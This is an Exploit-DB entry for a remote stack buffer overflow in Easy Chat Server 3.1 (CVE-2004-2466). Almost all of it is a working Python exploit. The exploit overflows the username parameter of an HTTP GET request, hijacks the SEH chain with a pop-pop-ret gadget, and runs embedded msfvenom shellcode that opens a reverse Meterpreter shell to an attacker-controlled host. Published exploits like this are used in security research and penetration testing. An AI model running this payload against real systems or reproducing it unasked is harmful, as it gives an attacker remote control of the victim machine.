Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

EDB-ID:

50999


Author:

r00tpgp

Type:

remote


Platform:

Windows

Date:

2022-08-01


# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466 
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)

#!/usr/bin/python3

import sys
import socket
from struct import pack

host = sys.argv[1]  # Recieve IP from user
port = int(sys.argv[2])  # Recieve Port from user

junk = b"A" * 217
nseh = pack("<L", 0x06eb9090)  # short jump 6 bytes
seh = pack("<L", 0x1001ae86)  # pop pop ret 1001AE86 SSLEAY32.DLL

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode
shellcode = b"\x90" * 16
shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33"
shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6"
shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26"
shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f"
shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16"
shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a"
shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35"
shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21"
shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84"
shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90"
shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78"
shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9"
shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa"
shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e"
shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e"
shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e"
shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0"
shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0"
shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac"
shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43"
shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9"
shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2"
shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee"
shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6"
shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde"
shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b"
shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44"

buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n"
buffer += b"User-Agent: Mozilla/4.0\r\n"
buffer += b"Host: 192.168.1.136:80\r\n"
buffer += b"Accept-Language: en-us\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Referer: http://192.168.1.136\r\n"
buffer += b"Connection: Keep-Alive\r\n\r\n"

print("[*] Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
print("[+] Done!")